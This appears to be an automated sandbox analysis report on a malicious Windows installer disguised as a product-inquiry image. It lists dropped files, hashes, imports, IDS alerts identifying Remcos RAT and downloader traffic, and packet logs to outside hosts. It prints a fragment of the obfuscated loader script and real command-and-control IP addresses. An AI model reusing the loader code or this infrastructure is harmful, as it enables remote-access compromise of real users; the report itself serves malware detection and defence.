                                                                      Preview:$Syrtic230rbejdstilbuddenes=$sekstendedelsnodensrkning;..<#Phenalgin Noe Hartling Unfoully #>..<#Compleated Wooraris Gavotternes Gyptologernes #>..<#Skyggekabinets Stockpiles klysner Dissonancies Postoffices #>..<#Prescience Baduljernes Kjkkenet Propensity Funnymen #>..<#Kildeskatteoplysningers sandspur Knapscull Lewdly #>..<#Dabblingness Afsejlede filmfotografernes Nonidiomaticalness Chitimacha Imprimaturet #>...$Conkers = @'. Frerfe.Mortclo$CertifiTEsotrophUnderceyReforgemSocio eoSubbranpth rnherNonsporiKonkretvSlatewooCeruminuHrfreresSteenbo=Socialb$Sge nstU Palpatn Krystab egronieSteuropwhjreliniI,oliselPterobrdpolys ae nbusinrStutseriIndskydnApothesgTjenersl LimbydyPhrygan;Sma der.DicemanfDybfry u HenaanndecelercApemanmtDemetdeibe.andloWaterdonSte oed ForstenBGlarm sePaataletst rvilnBybefolkHallucinBreastpiAtombomnJernbangPantilesaktieantIodhydriKina.std mpersa Carapin(Dobb.lt$AppellaSSwineliyijussitrligningtSu sferiDyspr.sc Rainie2S urers3In,igna0,alatog,L.ngrag$Tricho sFrnut deK
                                                                      Process:C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):268376
                                                                      Entropy (8bit):1.2452050603647282
                                                                      Encrypted:false
                                                                      SSDEEP:768:qLgWfnr8+2FUsZm0B9SekbxU0O4+vzFghmLhmuSGDEt29AgJe8Gwy3qbsh2f/gzd:fWD87eUTkRORhDAMHx5/Q
                                                                      MD5:9F165D4B6073826D03B00BBBDF7BA163
                                                                      SHA1:26251E57F7BD0E1CD0F03249ADE3657521B2B089
                                                                      SHA-256:7D466B668E471DF48E3852A906B0625E4AE024EB2728795EF3DA898815EB5A5F
                                                                      SHA-512:064A5045BBB737A5C5AC5994E6D8ACD0D24DCA76655C944192AAB2136195C11D6C22284BB24DB3A4A3E82543738E503D21F9D609D7D42A6DE0F4A7B90A48E5E5
                                                                      Malicious:false
                                                                      Preview:..........................q......o.............................. ..............~......................P......].....(.......................W.........................$.....D.................^.............;.{...................................j..........o..........................................................................................!................n......}...............................................................................................}............................................kN...,..........................................................................G.....................@..............................................z.......................................S...................................[)..........%W...............................................................-................................................k...........q.......................................l..........E..........................................................................M..
                                                                      Process:C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):434819
                                                                      Entropy (8bit):1.2583835758690312
                                                                      Encrypted:false
                                                                      SSDEEP:1536:Y2dHtzRzGpErAfmh6tyfeCOfrCmf3XRWxYgT0Gcu:Y2tpGpEMfhwGj9xWmu
                                                                      MD5:A254D81B4F25BC2B7D74ED5AC8EF3877
                                                                      SHA1:2098FCD61A958C772E7EEDD5BB736DEAC2F0BD39
                                                                      SHA-256:F45DA7C81581E6C3F3211FB431A8259D2C05FA60635F4E1C764584467B71EBB4
                                                                      SHA-512:5CB1F8672197DA9CF3B4461CC470BDB0E3E4965EB6D3C7170168A4AF3D00EC23A1474281766F790FCC6FC577FCCF89971A5ADDEC5C1F220F618C6887EC6607E3
                                                                      Malicious:false
                                                                      Preview:............J.........................5.............3............................j6...................................................r.................Y.....\............._...................................................................N......................................................................................r......................L.........................V...............................................J..............................................................................................................................6.................................................................X...#........................6.............................B.....................................................A........E......?....................................................e........................................!................................^............Z...........=...............'.....................................................................................
                                                                      Process:C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):294505
                                                                      Entropy (8bit):1.2488000301068016
                                                                      Encrypted:false
                                                                      SSDEEP:768:txFBGigst6Ktufdhc2AfcZYoiUn4Ifok+J3hvb/1qLwXG4CYK/syWevlwGCo5Anv:+rEQCRq7nSo9RXfFIO
                                                                      MD5:58B7AE07C38A1066937238A856BD92D8
                                                                      SHA1:F6C9D70FC390B12FBC33290A9749011063CECC8E
                                                                      SHA-256:3E5BBE9EF855B842477182E91303711E7AF14357B53EC3A44108451AD385A8ED
                                                                      SHA-512:24AABD6252F82A3B79F0BCF9BDBEA4D0FD69E73168CEB67BC8D41877F7688B2C687A9F581FB61674762217A733E9A90EF825E292D86886A58B46DF03140590AF
                                                                      Malicious:false
                                                                      Preview:........................................~..&................................."...X........)...............................]...............................................................................................<............................................~....................................].............y...............O.....................................o..........................Q.............S...........................................I.................................................2.........?...........................................................................................................W.......7E.........T................................................................................1.I.....................................>....o.......5..........(....................G_.............a...............................................s....y.............M..............................\.L...6.....E...............C..................................K.................
                                                                      Process:C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe
                                                                      File Type:ASCII text, with very long lines (327), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):409
                                                                      Entropy (8bit):4.212186765669671
                                                                      Encrypted:false
                                                                      SSDEEP:12:AV0BfINlntYlNVS1L7AxLUTCnI3rzmI+EqC4MBtyqmVDO:AV0CraVkfAxYGnorzPy0/d
                                                                      MD5:625B36BABBED7A576AD4C4B70467A73D
                                                                      SHA1:30CA24945718E16042BA7241CBC5DD48D6DF025C
                                                                      SHA-256:B5F2EABD150BB98325687E2153C491DC306318F11FF7357A13FDE4DB26228DE2
                                                                      SHA-512:D0FFBE09BE20CEFABE9642C6BD6B1F5CA7A67DD91F7544C611AA4B6BFF994066538C61CB3AF78592A89F914DFB1766A6CD776BCF3142F5E0F8FDDB9B61E94A3F
                                                                      Malicious:false
                                                                      Preview:charterselskabernes denationalised oceaned gonne sahoukar fascistization udelade..fortroppernes freezingsphere phora sassias irregenerate reedman paahngene.isblomster undersaatten skver couteau cyclopaedia.agterskibene outperform solides selvhjtideligt kodeordene,futiliteterne flgegruppe antimetathetic voldtaget.ratableness endevendtes koldtvandspumpe bulimoid spinderskerne kontrolpanelet dobbeltbekkasins,
                                                                      Process:C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):388372
                                                                      Entropy (8bit):1.2540566754729907
                                                                      Encrypted:false
                                                                      SSDEEP:768:u7ciff9lOGuK5SWKMT0YlK5f+3aPzLDajh5TFnaqW2tiRFBnlCobowHLG2GYDQ2Q:GPKvz2BEEwr3xGh/fTesv4erCH+dh
                                                                      MD5:3F73B6C7D42870E8CDDA56D4FD394D77
                                                                      SHA1:637E3682B4DC586E6CF385C13972C73EFB599D27
                                                                      SHA-256:9932880882AA32509B59671EC75309928F7528887991F0DA0689C66432EA912D
                                                                      SHA-512:32471D03BC156050638498AF682AEDB513D93B287D0A1A01EE98A84F9AEA15AF33F51D3C0C167ACD15622CF109DBFF45FBE8D85A829A470F88C77D37BA246FF3
                                                                      Malicious:false
                                                                      Preview:.......................X...........................................}..............................................y.........q.....................>q.....................................................................b....w........................".e....................................9...............A..........................".........................%.....o......................8.....y...................................:.\(...............0D.......8y................................^.......................................q......................`.........................q.................................?...................................=........W..2....................................0&.............................H.......................]..............(...O.......................................................................................]....................................`..........................................................................(.............................
                                                                      Process:C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):214266
                                                                      Entropy (8bit):1.2412885160899436
                                                                      Encrypted:false
                                                                      SSDEEP:768:+vfwfNRNOp2ZrQAVSeRobZAwMaEqME3M4urNq2PYvyaM+7IJR056z+u4RQAj9CjO:iMNnGeIPWxtH8oRcUc1K
                                                                      MD5:4076A043E9FE3329296286A1B8611CD5
                                                                      SHA1:5E1CCE1F26E7D2BD6BB20B3C85271306D8DA6451
                                                                      SHA-256:42498BC78985A5541757B01392DB112498B2366ACC62B19F6A9FF98D38A08C20
                                                                      SHA-512:59390AD6213D92FA4C819862E62EFCB8DB6512BE84DB92D3DF1AE7352B6D3201495387E62C67C6D7A77E7C14024120862660491D423BDA30F1173276A7FB35E0
                                                                      Malicious:false
                                                                      Preview:..9........L.9....................................U......................VV........_.I.v.......Q...............w...............E....V............q..............f..............................'.............-....................................................................................................................=........................8.........+..............................Aq.....q......................................................................c.................6..................E.......................&............................................................................................................................Q...........................L..........................@.1....................................................................+...........J...........)...................................b....................D....?.........................c..............4%........................s.............e.....................C...............................
                                                                      Process:C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):296728
                                                                      Entropy (8bit):1.253539677733899
                                                                      Encrypted:false
                                                                      SSDEEP:768:Sw3vYgNea/DQgTdF+OL3qHuqcZpzWjkdyLjb/idE4M43CU28uw4ETtWJJYWLJRzZ:jQghXEcn/M4Sp4TtAPSxvP2r
                                                                      MD5:B7F28FFF6ADCDB992FF7C480241C20AB
                                                                      SHA1:2F6856EB5E69B9532243848266AE3CB08883D375
                                                                      SHA-256:7568F3BB04C33265A9AC50E8FA4059081BAF8D276380D8D94F084CBAC66A52F5
                                                                      SHA-512:DB394D6D892F6B911C8E4D3FBD343827AD7CA4357A10A6B50035961685CF39D15D0892B42BA044948DDED871CBA2A123FCD15AEC220ABB9A1CAC16150FC1FFEF
                                                                      Malicious:false
                                                                      Preview:...................................................................f................................................................................................................\..................................B.........................8..... .......................`................................^........C....................................................................................d.................................................$......................................................................................,......................................J.......q...~...........................................%....................................................<.......g.....................................................................2...........J...........1y.....a...................w.................\...................g....................................................{r...i........................."............[5...................................................
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Entropy (8bit):7.923156806104517
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:Image_Product_Inquiry_Request_Villoslada.exe
                                                                      File size:718'232 bytes
                                                                      MD5:74436e65e2a2612fb6a127990d81f44d
                                                                      SHA1:d3fb7c67c6441d908a91d6e6b86e38c85b47b877
                                                                      SHA256:3e6b2955e8e0ddd77f3886b9727ea7a38657d4f0af47130559a8cefe1c87ea97
                                                                      SHA512:bbd6102c6759d61cb701cf235e2bfea442cfd702ad9def2e4d5134259678ecc0f79488e66d9e7bdfa39ae621f25ed5c68ccc21a298ddb5df497bd72070c0d491
                                                                      SSDEEP:12288:4Mwd9MAsZuwxTSesxl98vQJXQNqlSFQkuizwFFRNkpXmGzEk/in5IAvmtnRHPG62:4Mwd9MAgSBP84JeqlSFQdimvkm2t/6kY
                                                                      TLSH:B0E4230072F7D4ABC43316BA94AA8B75D760ED1508BDD90B0F917E98733E6F1610A7A3
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....$_.................f...*.....
                                                                      Icon Hash:074c0707091bb06a
                                                                      Entrypoint:0x40348f
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:true
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x5F24D6C5 [Sat Aug 1 02:43:17 2020 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:6e7f9a29f2c85394521a08b9f31f6275
                                                                      Signature Valid:false
                                                                      Signature Issuer:CN=Spaerrer, O=Spaerrer, L=Valzergues, C=FR
                                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                      Error Number:-2146762487
                                                                      Not Before, Not After
                                                                      • 03/06/2024 10:26:59 03/06/2027 10:26:59
                                                                      Subject Chain
                                                                      • CN=Spaerrer, O=Spaerrer, L=Valzergues, C=FR
                                                                      Version:3
                                                                      Thumbprint MD5:BA4B092CCFC844C4AE977BE2EC22657E
                                                                      Thumbprint SHA-1:238B823CCAC230229B9CD121EF1A23E62467BB4A
                                                                      Thumbprint SHA-256:06C1575E54A79687AFB2B6680C3557AD23474D0F9D56575179140150E0278ECA
                                                                      Serial:45B0FEC82F46823DDF4525FABB3D19F4D1B0C016
                                                                      Instruction
                                                                      sub esp, 000002D4h
                                                                      push ebx
                                                                      push esi
                                                                      push edi
                                                                      push 00000020h
                                                                      pop edi
                                                                      xor ebx, ebx
                                                                      push 00008001h
                                                                      mov dword ptr [esp+14h], ebx
                                                                      mov dword ptr [esp+10h], 0040A2E0h
                                                                      mov dword ptr [esp+1Ch], ebx
                                                                      call dword ptr [004080CCh]
                                                                      call dword ptr [004080D0h]
                                                                      and eax, BFFFFFFFh
                                                                      cmp ax, 00000006h
                                                                      mov dword ptr [0042A22Ch], eax
                                                                      je 00007F36C050D0C3h
                                                                      push ebx
                                                                      call 00007F36C05103B1h
                                                                      cmp eax, ebx
                                                                      je 00007F36C050D0B9h
                                                                      push 00000C00h
                                                                      call eax
                                                                      mov esi, 004082B0h
                                                                      push esi
                                                                      call 00007F36C051032Bh
                                                                      push esi
                                                                      call dword ptr [00408154h]
                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                      cmp byte ptr [esi], 00000000h
                                                                      jne 00007F36C050D09Ch
                                                                      push 0000000Bh
                                                                      call 00007F36C0510384h
                                                                      push 00000009h
                                                                      call 00007F36C051037Dh
                                                                      push 00000007h
                                                                      mov dword ptr [0042A224h], eax
                                                                      call 00007F36C0510371h
                                                                      cmp eax, ebx
                                                                      je 00007F36C050D0C1h
                                                                      push 0000001Eh
                                                                      call eax
                                                                      test eax, eax
                                                                      je 00007F36C050D0B9h
                                                                      or byte ptr [0042A22Fh], 00000040h
                                                                      push ebp
                                                                      call dword ptr [00408038h]
                                                                      push ebx
                                                                      call dword ptr [00408298h]
                                                                      mov dword ptr [0042A2F8h], eax
                                                                      push ebx
                                                                      lea eax, dword ptr [esp+34h]
                                                                      push 000002B4h
                                                                      push eax
                                                                      push ebx
                                                                      push 004216C8h
                                                                      call dword ptr [0040818Ch]
                                                                      push 0040A2C8h
                                                                      Programming Language:
                                                                      • [EXP] VC++ 6.0 SP5 build 8804
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x7448.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xaec980x900
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x64110x66001be075c408f39c844a297d85521f5b93False0.6545266544117647data6.40243296676441IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x80000x13980x1400e3e8d62e1d2308b175349eb9daa266c8False0.4494140625data5.137750894959169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0xa0000x203380x60092925084f722469459e6111e8ee4a9d0False0.5013020833333334data4.020801365171916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .ndata0x2b0000x1f0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0x4a0000x74480x7600ca4a61d66e18de2d709e337b4eff0905False0.4347854872881356data4.324925801072674IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0x4a3580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3650414937759336
                                                                      RT_ICON0x4c9000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4655253283302064
                                                                      RT_ICON0x4d9a80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.5149253731343284
                                                                      RT_ICON0x4e8500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.47622950819672133
                                                                      RT_ICON0x4f1d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.6868231046931408
                                                                      RT_ICON0x4fa800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672EnglishUnited States0.6693548387096774
                                                                      RT_ICON0x501480x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4328034682080925
                                                                      RT_ICON0x506b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5159574468085106
                                                                      RT_DIALOG0x50b180x100dataEnglishUnited States0.5234375
                                                                      RT_DIALOG0x50c180x11cdataEnglishUnited States0.6091549295774648
                                                                      RT_DIALOG0x50d380xc4dataEnglishUnited States0.5918367346938775
                                                                      RT_DIALOG0x50e000x60dataEnglishUnited States0.7291666666666666
                                                                      RT_GROUP_ICON0x50e600x76dataEnglishUnited States0.6440677966101694
                                                                      RT_VERSION0x50ed80x22cdataEnglishUnited States0.512589928057554
                                                                      RT_MANIFEST0x511080x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384
                                                                      DLLImport
                                                                      ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                      SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                      ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                      USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-08T18:10:14.065739+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.549704TCP
                                                                      2024-11-08T18:10:54.116876+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.549910TCP
                                                                      2024-11-08T18:11:02.086657+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549950103.72.57.12080TCP
                                                                      2024-11-08T18:11:07.615091+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549979185.150.191.1174609TCP
                                                                      2024-11-08T18:11:08.662356+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.549981185.150.191.1174609TCP
                                                                      2024-11-08T18:11:08.806124+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549980178.237.33.5080TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 8, 2024 18:11:00.050729990 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:00.056134939 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:00.056205034 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:00.056351900 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:00.061304092 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.086581945 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.086613894 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.086632013 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.086659908 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.086657047 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.086683035 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.086689949 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.086714983 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.086743116 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.086749077 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.086790085 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.302337885 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.302361012 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.302371979 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.302386999 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.302387953 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.302401066 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.302405119 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.302413940 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.302417040 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.302427053 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.302444935 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.302474976 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.303137064 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.303148985 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.303159952 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.303180933 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.303200006 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.303478956 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.303524017 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.304145098 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.304184914 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.518250942 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.518282890 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.518295050 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.518317938 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.518357038 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.518361092 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.518374920 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.518387079 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.518397093 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.518400908 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.518445015 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.518469095 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.519213915 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.519239902 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.519252062 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.519356966 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.519366980 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.519377947 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.519404888 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.519418955 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.519490004 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.519535065 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.521261930 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.521274090 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.521285057 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.521305084 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.521316051 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.521429062 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.521440983 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.521471024 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.521492004 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.521615028 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.521626949 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.521639109 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.521651983 CET8049950103.72.57.120192.168.2.5
                                                                      Nov 8, 2024 18:11:02.521665096 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.521665096 CET4995080192.168.2.5103.72.57.120
                                                                      Nov 8, 2024 18:11:02.521682978 CET4995080192.168.2.5103.72.57.120
